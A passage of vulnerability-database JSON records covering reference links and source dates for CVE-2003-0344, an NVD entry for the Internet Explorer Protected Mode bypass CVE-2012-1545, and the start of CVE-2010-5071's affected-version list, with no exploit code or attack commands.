"trust": 1.6,
"url": "http://secunia.com/advisories/8943"
},
{
"trust": 1.6,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-020"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a922"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=105476381609135\u0026w=2"
},
{
"trust": 1.6,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2003-july/006401.html"
},
{
"trust": 0.9,
"url": "http://www.eeye.com/html/research/advisories/ad20030723.html"
},
{
"trust": 0.9,
"url": "http://support.microsoft.com/default.aspx?scid=kb;en-us;819696"
},
{
"trust": 0.8,
"url": "http://www.openssh.com/txt/buffer.adv"
},
{
"trust": 0.8,
"url": "http://www.mindrot.org/pipermail/openssh-unix-announce/2003-september/000062.html"
},
{
"trust": 0.8,
"url": "http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/openssh/files/patch-buffer.c"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/10156/"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-039.asp"
},
{
"trust": 0.8,
"url": "http://www.xfocus.org/advisories/200307/4.html"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-030.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/windows/ie/downloads/critical/818529/default.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/security/security_bulletins/ms03-020.asp"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/8943/"
},
{
"trust": 0.8,
"url": "http://www.lac.co.jp/security/english/snsadv_e/68_e.html"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-032.asp"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/object.asp"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/12970"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0344"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0344"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-020.asp"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-032.asp"
},
{
"trust": 0.3,
"url": "http://www.kb.cert.org/vuls/id/334928"
},
{
"trust": 0.3,
"url": "http://www.kb.cert.org/vuls/id/813208"
},
{
"trust": 0.3,
"url": "/archive/1/324265"
},
{
"trust": 0.3,
"url": "/archive/1/323895"
},
{
"trust": 0.3,
"url": "http://www.cert.org/"
},
{
"trust": 0.3,
"url": "http://www.cert.org/cert_pgp.key"
},
{
"trust": 0.2,
"url": "http://www.kb.cert.org/vuls/id/561284"
},
{
"trust": 0.2,
"url": "http://www.kb.cert.org/vuls/id/326746"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/265232"
},
{
"trust": 0.1,
"url": "http://microsoft.com/technet/security/bulletin/ms03-030.asp"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-18.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/cs-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/412478"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/333628"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/567620"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/104280"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/686224"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/575892"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/732952"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/989932"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/09/19/archive.html#swena"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/"
},
{
"trust": 0.1,
"url": "http://www.cert.org/stats/cert_stats.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/784980"
},
{
"trust": 0.1,
"url": "http://www.cert.org/training/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/838572"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/967668"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/current_activity.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-28.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-27.html"
},
{
"trust": 0.1,
"url": "https://www.cert.org/contact_cert/encryptmail.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/incident_notes/in-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/435444"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-26.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-24.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-25.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-23.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/935264"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/467036"
},
{
"trust": 0.1,
"url": "https://www.cert.org/pgp/cert_pgp_key.asc"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/255484"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/865940"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/380864"
},
{
"trust": 0.1,
"url": "http://www.cert.org/congressional_testimony"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/422156"
},
{
"trust": 0.1,
"url": "http://www.cert.org/csirts/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/254236"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/483492"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-19.html"
},
{
"trust": 0.1,
"url": "http://microsoft.com/technet/security/bulletin/ms03-026.asp"
},
{
"trust": 0.1,
"url": "http://support.microsoft.com?kbid=823980"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "PACKETSTORM",
"id": "31444"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "PACKETSTORM",
"id": "31490"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#813208"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#561284"
},
{
"db": "CERT/CC",
"id": "VU#679556"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "BID",
"id": "7806"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"db": "PACKETSTORM",
"id": "31444"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "PACKETSTORM",
"id": "31490"
},
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-09-16T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-08-26T00:00:00",
"db": "CERT/CC",
"id": "VU#813208"
},
{
"date": "2003-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-07-24T00:00:00",
"db": "CERT/CC",
"id": "VU#561284"
},
{
"date": "2003-06-04T00:00:00",
"db": "CERT/CC",
"id": "VU#679556"
},
{
"date": "2003-08-26T00:00:00",
"db": "CERT/CC",
"id": "VU#334928"
},
{
"date": "2003-06-04T00:00:00",
"db": "BID",
"id": "7806"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"date": "2003-07-28T00:43:46",
"db": "PACKETSTORM",
"id": "31444"
},
{
"date": "2003-11-25T05:25:51",
"db": "PACKETSTORM",
"id": "32268"
},
{
"date": "2003-08-05T18:53:20",
"db": "PACKETSTORM",
"id": "31490"
},
{
"date": "2003-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"date": "2003-06-16T04:00:00",
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-09-03T00:00:00",
"db": "CERT/CC",
"id": "VU#813208"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#561284"
},
{
"date": "2003-06-04T00:00:00",
"db": "CERT/CC",
"id": "VU#679556"
},
{
"date": "2005-08-11T00:00:00",
"db": "CERT/CC",
"id": "VU#334928"
},
{
"date": "2009-07-11T22:06:00",
"db": "BID",
"id": "7806"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2003-000168"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200306-069"
},
{
"date": "2021-07-23T12:55:00",
"db": "NVD",
"id": "CVE-2003-0344"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH contains buffer management errors",
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200306-069"
}
],
"trust": 0.6
}
}
FKIE_CVE-2012-1545
Vulnerability from fkie_nvd - Published: 2012-03-09 11:55 - Updated: 2025-04-11 00:51
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:10:consumer_preview:*:*:*:*:*:*",
"matchCriteriaId": "AD1E2761-48DA-444F-BC45-44F1401322F2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A19F6133-25D1-44A5-B6B9-354703436783",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2462.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "314538E8-48EC-4869-9074-2A1F5B7CBB3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2479.0006:*:*:*:*:*:*:*",
"matchCriteriaId": "F56B3A72-7C5E-4F0C-BBC7-AA13DDFBEE70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"matchCriteriaId": "68656E52-AD8A-474E-9160-CD5F8857254B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2600.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "6876CE89-AA70-44C5-8A69-E2ED7A63F570",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"matchCriteriaId": "93F47C82-E767-47A8-88DE-417B004ED7FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "F86E7189-CE21-4007-A3FA-39A6B51A5AB9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE2555F-C4BE-482F-8DD9-976D2026058C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "7B90EA4B-DA10-44B7-BD3D-6AE1197212D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "61F352FE-C22E-4B33-A46F-77A164B5DABB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3663.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "5ACD5A44-0926-4A1B-9900-1E7CC0A561C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3718.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "196CEE37-2E3A-41A7-9AC1-0D5CC3F35D8F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "3E16BEF4-71AA-4E23-B438-D25FFABDB646",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.1830:*:*:*:*:*:*:*",
"matchCriteriaId": "1F32702E-F955-4DDB-B235-7C47E882453C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.3959:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA2B4AD-C04D-4A6B-8570-5A2F5489F750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "506711D9-6E57-4EED-8628-36C7F2324040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "ED471260-0272-431F-A91E-AC2883D92497",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "63D18070-EC48-4904-9AE0-558F7F3B869D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "86584E3F-3B0D-4018-A186-E59F3B01CA5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:unknown:gold:*:*:*:*:*",
"matchCriteriaId": "817636ED-5E42-460E-89F1-24D5C64AB8BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0E6E1020-1017-4670-9316-27C79F1E2698",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.5730.1100:*:*:*:*:*:*:*",
"matchCriteriaId": "37F63AE1-8FC9-4C0F-8D19-F17DFA214E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16386:*:*:*:*:*:*:*",
"matchCriteriaId": "35B1186A-FA5B-4E49-8C2F-BCD2D45F22A2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16441:*:*:*:*:*:*:*",
"matchCriteriaId": "53D75496-8594-44DB-B5C4-EA3CABD6551A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:*:*:*:*:*:*:*",
"matchCriteriaId": "5F709B61-F64B-4E8F-80BB-4944485B6125",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:beta:*:*:*:*:*:*",
"matchCriteriaId": "612B8367-DAEF-4EE3-BC57-16A5CF4D3030",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*",
"matchCriteriaId": "C043EDDD-41BF-4718-BDCF-158BBBDB6360",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
},
{
"lang": "es",
"value": "Microsoft Internet Explorer v6 a v9, y v10 Consumer Preview, permite a atacantes remotos eludir el modo protegido o causar una denegaci\u00f3n de servicio (por corrupci\u00f3n de memoria), aprovechando el acceso a un proceso de baja integridad, como lo demostr\u00f3 VUPEN durante una competencia Pwn2Own en CanSecWest 2012"
}
],
"id": "CVE-2012-1545",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2012-03-09T11:55:01.193",
"references": [
{
"source": "cve@mitre.org",
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"source": "cve@mitre.org",
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"source": "cve@mitre.org",
"url": "http://twitter.com/vupen/statuses/177895844828291073"
},
{
"source": "cve@mitre.org",
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://twitter.com/vupen/statuses/177895844828291073"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2010-5071
Vulnerability from fkie_nvd - Published: 2011-12-07 19:55 - Updated: 2025-04-11 00:51
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:7.0.6000.16711:*:*:*:*:*:*:*",
"matchCriteriaId": "77497F7F-1853-448A-8448-8FB6FA43169B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0.7600.16385:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A9719-9C14-4843-A6A9-CF4AF804B37D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0b:*:*:*:*:*:*:*",
"matchCriteriaId": "587DAAD1-F33D-41EB-B752-36B9D87FC19B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB024757-60F3-44F9-BCFF-04B2F109D7A2",
"versionEndIncluding": "8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF9241-A175-438C-A793-3D245BE2AE35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F62AC866-A06F-47DB-AEDF-E345CE0B14A4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "943D5C5C-FC49-4EDE-AE75-A79CFF42208E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "59EB6841-0427-479B-8771-06DF62EE3C87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "8873A08F-D4C7-46FC-8FE5-972644F85ADA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B815D9-BC21-4A17-AF00-B8AD181027D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "42502347-DD40-4F8C-9861-C0A88A3F8608",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "0AF9C64F-9A67-4BA9-A653-75507935E6EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "C375A9AA-505B-444C-A45F-2BAAD0B2CD0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:*:*:*:*:*:*:*",
"matchCriteriaId": "B9D82B89-456D-41CB-A894-B6A22FB4415D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "44FF4E47-AD75-42C7-BB84-42BBA46A58B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2E21CE6E-2B33-4225-B1DC-C19F1D578040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1B26CE22-E730-4247-853E-5E640DB3ECB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.308:*:*:*:*:*:*:*",
"matchCriteriaId": "0A652453-AB5F-405C-ABDE-CE1B54FEACED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.520:*:*:*:*:*:*:*",
"matchCriteriaId": "141080AB-48DE-4885-BAB6-6F0937ABD49B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1155:*:*:*:*:*:*:*",
"matchCriteriaId": "EB758D76-B7F6-4E87-B88D-620443655CA9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1158:*:*:*:*:*:*:*",
"matchCriteriaId": "28655AC5-1512-4F45-9963-CA26F73981CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1215:*:*:*:*:*:*:*",
"matchCriteriaId": "C00F4F36-B88A-4FDB-BE52-83C6EF60BDB7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "BEC05584-F553-4D29-9C46-C9EE5F0CB166",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.544:*:*:*:*:*:*:*",
"matchCriteriaId": "B108A86E-8387-446C-B823-BE6FCAE747A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1008.3:*:*:*:*:*:*:*",
"matchCriteriaId": "BA3F79B8-512A-4B88-868C-7C4ADFD223C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1712.6:*:*:*:*:*:*:*",
"matchCriteriaId": "078C3A86-C9F8-4A19-9DDC-1065B54E640F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.2106.8:*:*:*:*:*:*:*",
"matchCriteriaId": "9030923C-356E-4FAB-8E64-03D462B4DB5F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3110.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DC0FFABC-8BED-4838-85FE-406DC9CF9B92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3612.1713:*:*:*:*:*:*:*",
"matchCriteriaId": "C9DB4A00-4F70-4189-81BD-9318C52DF2D2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5:*:*:*:*:*:*:*",
"matchCriteriaId": "B4071D03-D955-4C1B-ACD8-A864F7D0FA02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E6B8985B-B927-4928-B1DB-18E29F796992",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3A04FEA6-37B0-44B0-844F-55652ABA1F85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "4D56FB8E-2553-47C1-82A2-9E59023780CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "8541EEED-94F4-42F8-9719-57F3EC85D52B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp3:*:*:*:*:*:*",
"matchCriteriaId": "40372520-08CF-4F64-A7AC-7E0AE0964138",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp4:*:*:*:*:*:*",
"matchCriteriaId": "2EB39B99-91A0-4B70-B12A-BA37F6AFBA83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0518.10:*:*:*:*:*:*:*",
"matchCriteriaId": "FBFE8C8E-F46C-4179-AE83-CE4720C8E0E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0910.1309:*:*:*:*:*:*:*",
"matchCriteriaId": "61125B09-23AA-4D5A-8332-6B5CCD80C7A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2014.0216:*:*:*:*:*:*:*",
"matchCriteriaId": "3AECF59F-B3C0-44CC-B77A-30E32B3E8BB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2314.1003:*:*:*:*:*:*:*",
"matchCriteriaId": "D4690B85-86B9-448E-9249-B3885DEDC60E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2516.1900:*:*:*:*:*:*:*",
"matchCriteriaId": "4E215C82-E4AD-4B87-92D8-DD4D486EB6EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2614.3500:*:*:*:*:*:*:*",
"matchCriteriaId": "D91F4C80-3B1B-45BD-966F-C9DBF98B875D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.800:*:*:*:*:*:*:*",
"matchCriteriaId": "F65E0DC1-40F6-4252-945A-A972343D1E29",
"vulnerable": true
},
{
